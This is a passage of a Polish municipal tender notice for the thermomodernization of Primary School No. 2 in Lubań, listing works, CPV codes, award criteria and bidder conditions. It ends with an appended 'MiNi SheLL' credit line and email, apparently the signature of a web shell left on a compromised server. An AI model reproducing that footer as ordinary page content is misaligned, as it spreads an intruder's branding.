aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część Nr 2: Termomodernizacja budynku Szkoły Podstawowej nr 2 w Lubaniu.<br/><br/>Przedmiotem zamówienia są roboty budowlane w budynku Szkoły Podstawowej nr 2 w Lubaniu, związane z Termomodernizacją obiektu. Roboty obejmują:<br/>1)	ustawienie rusztowań elewacyjnych, montaż zsypów do gruzu<br/>2)	rozbiórkę pomieszczenia zbiornika wyrównawczego zlokalizowanego na dachu budynku głównego szkoły. Pomieszczenie murowane z bloczków betonu komórkowego, przykryte dachem z płyt korytkowych z pokryciem papowym<br/>3)	rozbiórkę istniejącego pokrycia z warstwą ocieplenia ze styropianu gr. 12 cm dachu budynku głównego, łącznika i dobudówki <br/>4)	rozbiórkę murowanych kominów wentylacyjnych łącznie z czapkami betonowymi do poziomu dachu<br/>5)	rozbiórkę wszystkich obróbek blacharskich dachu (blacha do złomowania)<br/>6)	rozbiórkę orynnowania dachu łącznie z uchwytami (blacha nie nadająca się do użytku)<br/>7)	demontaż instalacji odgromowej na dachu (drut do złomowania)<br/>8)	demontaż wywiewek kanalizacji sanitarnej<br/>9)	demontaż umieszczonych w elewacji frontowej i tylnej budynku, kratek wentylacyjnych wentylacji grawitacyjnej przestrzeni stropodachu<br/>10)	częściowy demontaż korytkowych płyt dachowych z betonową warstwa wyrównawczą (gr. ok. 7 cm) dla wykonania otworów roboczych do ocieplenia przestrzeni stropodachu. Demontaż należy przeprowadzić w sposób umożliwiający ponowne użycie płyt.<br/>11)	usunięcie istniejącej warstwy gr. ok. 10 cm z wiór i trocin ocieplającej stropodach <br/>12)	usunięcie istniejącej izolacji paroszczelnej z papy umieszczonej w wentylowanej przestrzeni stropodachu<br/>13)	ułożenie nowej izolacji paroszczelnej z papy w wentylowanej przestrzeni stropodachu<br/>14)	ocieplenie wentylowanego stropodachu, przez wdmuchnięcie granulatu z wełny mineralnej gr. 25 cm<br/>15)	ułożenie zdemontowanych żelbetowych płyt korytkowych (zamknięcie stropodachu)<br/>16)	uzupełnienie betonowej warstwy wyrównawczej gr.7 cm na płytach korytkowych<br/>17)	zagruntowanie betonowego podłoża i ułożenie dwuwarstwowego pokrycia z papy łączonej termicznie (warstwa podkładowa, warstwa nawierzchniowa)<br/>18)	podmurowanie kominów wentylacyjnych cegłą klinkierową licowaną do wysokości min. 40 cm ponad połać dachową z zakończeniem betonowymi czapkami kominowymi <br/>19)	wykonanie kompletnych obróbek blacharskich dachu z blachy tytanowo-cynkowej gr. 0,7 mm <br/>20)	montaż nowego orynnowania dachu rynnami o średnicy 150 mm wykonanymi z blachy tytanowo-cynkowej gr. min. 0,55 mm<br/>21)	montaż w elewacji frontowej i tylnej czerpni stalowych 14x14 cm z krućcem o długości 50 cm zakończonych żaluzją. Krućce mają umożliwić swobodny przepływ powietrza w strefie wentylowanej stropodachu, po wdmuchaniu granulatu z wełny mineralnej <br/>22)	budowę na dachu budynku głównego instalacji fotowoltaicznej o mocy 30 kWp<br/>23)	wykonanie instalacji odgromowej na dachu z drutu stalowego ocynkowanego śr. 8 mm<br/>24)	wykonanie uszczelnień masą silikonową w ościeżach od zewnątrz, wymienionej stolarki okiennej i drzwiowej zewnętrznej <br/>25)	wymianę instalacji centralnego ogrzewania w pomieszczeniach piwnicy i parteru dobudówki. Istniejąca instalacja stalowa spawana z grzejnikami żeliwnymi, zostanie wymieniona na instalację wykonaną z rur miedzianych z płytowymi grzejnikami stalowymi i włączona do węzła ciepłowniczego<br/>26)	wymianę instalacji ciepłej wody użytkowej i cyrkulacji w węzłach sanitarnych parteru, pierwszego i drugiego piętra oraz na odcinku poziomym w piwnicy do węzła ciepłowniczego. Istniejąca instalacja wykonana z rur stalowych zostanie wymieniona na instalację z rur miedzianych i włączona do zasobnika wody ciepłej w węźle ciepłowniczym <br/>27)	wymianę zasobnika cwu z wymianą armatury i punktów czerpalnych. Istniejący zasobnik cwu 2000 l zostanie wymieniony na biwalentny zasobnik cwu 300l.<br/>28)	wymianę instalacji wody zimnej w węzłach sanitarnych parteru, pierwszego i drugiego piętra oraz na odcinku od przyłącza do węzła ciepłowniczego<br/>29)	wymianę instalacji kanalizacji sanitarnej w węzłach sanitarnych parteru, pierwszego i drugiego piętra<br/>30)	wymianę armatury i przyborów sanitarnych<br/>31)	wymianę źródeł światła na LED w budynku głównym szkoły i łączniku. Wymianie podlegają wyłącznie źródła światła (świetlówki, żarówki) na zamienniki LED. Istniejące oprawy pozostają, należy je dostosować do ledowych źródeł światła. Całkowitej wymianie podlegają łączniki instalacji oświetlenia w budynku głównym szkoły i łączniku.<br/>32)	wymianę opraw oświetleniowych na LED w dobudówce. W pomieszczeniach dobudówki zostają wymienione istniejące mieszane oprawy na nowe kompletne oprawy LED wraz z łącznikami instalacji oświetlenia <br/>33)	montaż nakładek renowacyjnych z PCV na okienne parapety z lastryko<br/>34)	roboty murarskie, tynkarskie i malarskie związane z wymianą stolarki okiennej i drzwiowej<br/>35)	wymianę okładzin ściennych w węzłach sanitarnych<br/>36)	wymianę posadzek w węzłach sanitarnych<br/>37)	wywóz i utylizację odpadów pochodzących z rozbiórek<br/>38)	wykonanie badań sprawdzających instalacji elektrycznych i odgromowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45320000-6 - Roboty izolacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres wydłużonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące (dotyczy dwóch części):<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 200 000,00 zł (dwieście tysięcy złotych),<br/>4) Zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną obejmującą swoim zakresem szeroko pojętą termomodernizację obiektów budowlanych o wartości robót nie mniejszej niż 200 000,00 zł brutto. <br/><br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 4 do SWZ;<br/>2) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w art. 108 ust.1, art. 109 ust. 1 pkt 5,7 oraz art. 7 ust. 1 pkt 1-3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służące ochronie bezpieczeństwa narodowego – załącznik Nr 9 do SWZ;<br/>3)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - załącznik nr 5 do SWZ;<br/>2) dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały zawarte w projektowanych postanowieniach umowy stanowiącym załącznik Nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Urząd Miasta Lubań</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com